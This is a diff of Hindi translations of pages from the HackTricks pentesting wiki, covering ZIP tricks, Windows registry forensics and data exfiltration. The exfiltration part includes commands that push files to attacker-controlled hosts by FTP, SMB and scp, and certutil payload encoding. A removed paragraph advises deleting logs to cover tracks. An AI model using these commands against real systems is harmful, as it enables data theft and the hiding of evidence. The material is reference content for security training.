||||
|
||||
यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को प्रकट करता है, जहाँ प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा का पता लगाने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,27 +1,46 @@
|
|||
# ZIPs tricks
|
||||
# ZIPs ट्रिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**कमांड लाइन उपकरण** जो **ज़िप फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं जो ज़िप फ़ाइलें निदान, मरम्मत और क्रैकिंग के लिए हैं। यहाँ कुछ मुख्य उपयोगी उपकरण हैं:
|
||||
**कमांड-लाइन टूल्स** जो **zip फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं, zip फ़ाइलें का निदान करने, मरम्मत करने, और क्रैक करने के लिए। यहाँ कुछ मुख्य उपयोगी उपकरण हैं:
|
||||
|
||||
- **`unzip`**: बताता है कि ज़िप फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है।
|
||||
- **`zipdetails -v`**: ज़िप फ़ाइल प्रारूप क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है।
|
||||
- **`zipinfo`**: ज़िप फ़ाइल की सामग्री की सूची बनाता है बिना उन्हें निकाले।
|
||||
- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त ज़िप फ़ाइलों को मरम्मत करने की कोशिश करें।
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: ज़िप पासवर्ड की ब्रूट-फोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है।
|
||||
- **`unzip`**: बताता है कि एक zip फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है।
|
||||
- **`zipdetails -v`**: zip फ़ाइल प्रारूप के क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है।
|
||||
- **`zipinfo`**: उन्हें निकाले बिना zip फ़ाइल की सामग्री की सूची देता है।
|
||||
- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त zip फ़ाइलों को मरम्मत करने का प्रयास करें।
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: zip पासवर्ड का ब्रूट-फ़ोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है।
|
||||
|
||||
[ज़िप फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) ज़िप फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है।
|
||||
[Zip फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) zip फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है।
|
||||
|
||||
महत्वपूर्ण नोट: पासवर्ड से सुरक्षित ज़िप फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार नहीं एन्क्रिप्ट** करती हैं, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करती हैं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई ज़िप फ़ाइलें एक **प्लेनटेक्स्ट हमले** के लिए संवेदनशील हैं यदि किसी अनएन्क्रिप्टेड कॉपी की उपलब्ध है। एक उपलब्ध फ़ाइल का ज्ञात सामग्री का उपयोग करके ज़िप का पासवर्ड क्रैक करने के लिए यह हमला किया जा सकता है, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई ज़िप फ़ाइलें इस प्लेनटेक्स्ट हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विध
|
||||
महत्वपूर्ण है कि पासवर्ड से सुरक्षित zip फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार एन्क्रिप्ट नहीं करतीं**, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करतीं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई zip फ़ाइलें एक **सादाक्षर हमले** के लिए विकल्पशील हैं अगर किसी अनएन्क्रिप्टेड कॉपी की एक कम्प्रेस्ड फ़ाइल उपलब्ध है। यह हमला जानी गई सामग्री का उपयोग करता है ताकि zip का पासवर्ड क्रैक किया जा सके, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई zip फ़ाइलें इस सादाक्षर हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विधियों का चयन करने की महत्वता को प्रदर्शित करती है।
|
||||
|
||||
## संदर्भ
|
||||
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -2,20 +2,20 @@
|
|||
|
||||
### दिलचस्प Windows रजिस्ट्री कुंजी
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
|
||||
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
|
||||
{% endhint %}
|
||||
|
||||
### **Windows संस्करण और मालिक जानकारी**
|
||||
- **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा।
|
||||
|
@ -24,14 +24,14 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
- होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है।
|
||||
|
||||
### **समय क्षेत्र सेटिंग**
|
||||
- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित है।
|
||||
- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित होता है।
|
||||
|
||||
### **पहुंच समय ट्रैकिंग**
|
||||
- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होती है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें:
|
||||
`fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Windows संस्करण और सेवा पैक
|
||||
- **Windows संस्करण** में संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) दिखाता है, जबकि **सेवा पैक** में सुधार और कभी-कभी नए विशेषताएँ शामिल होती हैं।
|
||||
- **Windows संस्करण** संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) को दर्शाता है, जबकि **सेवा पैक** अपडेट हैं जिसमें सुधार और कभी-कभी नए सुविधाएँ शामिल होती हैं।
|
||||
|
||||
### अंतिम पहुंच समय सक्षम करना
|
||||
- अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है।
|
||||
|
@ -40,29 +40,29 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
- रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं।
|
||||
|
||||
### क्लाइंट साइड कैशिंग (CSC)
|
||||
- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर उन परिस्थितियों में जहां अंतरिक्षिक कनेक्टिविटी हो।
|
||||
- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर ऐसे वातावरणों में जिनमें अंतरिक्षिक संयोजन है।
|
||||
|
||||
### ऑटोस्टार्ट प्रोग्राम
|
||||
- विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं।
|
||||
|
||||
### शेलबैग्स
|
||||
- **शेलबैग्स** न केवल फ़ोल्डर दृश्य के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य माध्यमों के माध्यम से स्पष्ट न होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए।
|
||||
- **शेलबैग्स** न केवल फ़ोल्डर दृश्यों के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य साधनों के माध्यम से स्पष्ट नहीं होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए।
|
||||
|
||||
### USB जानकारी और फोरेंसिक्स
|
||||
- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस का पता लगाने में मदद कर सकते हैं, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं।
|
||||
### USB सूचना और फोरेंसिक्स
|
||||
- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस थे, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं।
|
||||
|
||||
### वॉल्यूम सीरियल नंबर
|
||||
- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का पता लगाने के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्रोत स्थापित करने के लिए फोरेंसिक स्थितियों में उपयोगी होता है।
|
||||
- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का ट्रैकिंग के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्थान स्थापित करने की आवश्यकता होती है।
|
||||
|
||||
### **शटडाउन विवरण**
|
||||
- शटडाउन समय और गणना (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखे जाते हैं।
|
||||
- शटडाउन समय और गिनती (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखी जाती हैं।
|
||||
|
||||
### **नेटवर्क कॉन्फ़िगरेशन**
|
||||
- विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें।
|
||||
- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, विभिन्न पथों में लॉग किए गए हैं **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**।
|
||||
- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** में विभिन्न पथों के तहत लॉग किए गए हैं।
|
||||
|
||||
### **साझा फोल्डर**
|
||||
- साझा फोल्डर और सेटिंग्स **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं।
|
||||
- साझा फोल्डर और सेटिंग **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं।
|
||||
|
||||
### **स्वचालित रूप से शुरू होने वाले प्रोग्राम**
|
||||
- पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं।
|
||||
|
@ -70,11 +70,11 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
### **खोजें और टंकित पथ**
|
||||
- एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए।
|
||||
|
||||
### **हाल के दस्तावेज़ और ऑफिस फ़ाइलें**
|
||||
- हाल के दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में।
|
||||
### **हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें**
|
||||
- हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में।
|
||||
|
||||
### **हाल ही में उपयोग किए गए (MRU) आइटम**
|
||||
- MRU सूचियाँ, हाल के फ़ाइल पथ और कमांड दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहित होती हैं।
|
||||
- MRU सूचियाँ, हाल ही में फ़ाइल पथ और कमांड को दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहीत होती हैं।
|
||||
|
||||
### **उपयोगकर्ता गतिविधि ट्रैकिंग**
|
||||
- उपयोगकर्ता सहायत
|
||||
- यूज़र असिस्ट फ़ीचर विस्तृत एप्लिकेशन उपयोग स
|
||||
|
|
|
@ -1,39 +1,40 @@
|
|||
# Exfiltration
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
**Try Hard सिक्योरिटी ग्रुप**
|
||||
|
||||
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
***
|
||||
|
||||
## सूचीबद्ध डोमेन्स जिन्हें सूचना निकालने के लिए सफेद सूची में शामिल किया गया है
|
||||
## सामान्यत: व्हाइटलिस्टेड डोमेन्स जिनसे सूचना निकाली जा सकती है
|
||||
|
||||
[https://lots-project.com/](https://lots-project.com/) पर जांच करें कि कौन से सामान्य व्हाइटलिस्टेड डोमेन्स का दुरुपयोग किया जा सकता है
|
||||
[https://lots-project.com/](https://lots-project.com/) पर जांच करें कि कौन से सामान्यत: व्हाइटलिस्टेड डोमेन्स का दुरुपयोग किया जा सकता है
|
||||
|
||||
## कॉपी और पेस्ट बेस64
|
||||
## कॉपी\&पेस्ट बेस64
|
||||
|
||||
**Linux**
|
||||
**लिनक्स**
|
||||
```bash
|
||||
base64 -w0 <file> #Encode file
|
||||
base64 -d file #Decode file
|
||||
```
|
||||
**Windows**
|
||||
**विंडोज**
|
||||
```
|
||||
certutil -encode payload.dll payload.b64
|
||||
certutil -decode payload.b64 payload.dll
|
||||
|
@ -150,7 +151,7 @@ mkdir -p /ftphome
|
|||
chown -R ftpuser:ftpgroup /ftphome/
|
||||
/etc/init.d/pure-ftpd restart
|
||||
```
|
||||
### **Windows** क्लाइंट
|
||||
### **Windows** ग्राहक
|
||||
```bash
|
||||
#Work well with python. With pure-ftp use fusr:ftp
|
||||
echo open 10.11.0.41 21 > ftp.txt
|
||||
|
@ -163,7 +164,7 @@ ftp -n -v -s:ftp.txt
|
|||
```
|
||||
## SMB
|
||||
|
||||
काली को सर्वर के रूप में उपयोग करें
|
||||
काली को सर्वर के रूप में
|
||||
```bash
|
||||
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
|
||||
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
|
||||
|
@ -185,23 +186,7 @@ guest ok = Yes
|
|||
#Start samba
|
||||
service smbd restart
|
||||
```
|
||||
### Exfiltration Techniques on Windows
|
||||
|
||||
#### Local Exfiltration
|
||||
|
||||
Local exfiltration techniques involve transferring data to devices within the local network or physically removing data from the target environment.
|
||||
|
||||
#### Remote Exfiltration
|
||||
|
||||
Remote exfiltration techniques involve transferring data to an external location outside the target network, typically controlled by the attacker.
|
||||
|
||||
#### Exfiltration Tools
|
||||
|
||||
Various tools can be used for exfiltration, such as **Netcat**, **FTP**, **PowerShell**, **BITSAdmin**, and **certutil**.
|
||||
|
||||
#### Covering Tracks
|
||||
|
||||
After exfiltrating data, it's essential to cover tracks by deleting logs, clearing event logs, and removing any evidence of the exfiltration activity.
|
||||
Windows के लिए एक्सफिल्ट्रेशन
|
||||
```bash
|
||||
CMD-Wind> \\10.10.14.14\path\to\exe
|
||||
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
|
||||
|
@ -211,7 +196,7 @@ WindPS-2> cd new_disk:
|
|||
```
|
||||
## SCP
|
||||
|
||||
हमलावर को SSHd चलाना होगा।
|
||||
हमलावर को SSHd चल रहा होना चाहिए।
|
||||
```bash
|
||||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
```
|
||||
|
@ -264,7 +249,7 @@ sniff(iface="tun0", prn=process_packet)
|
|||
```
|
||||
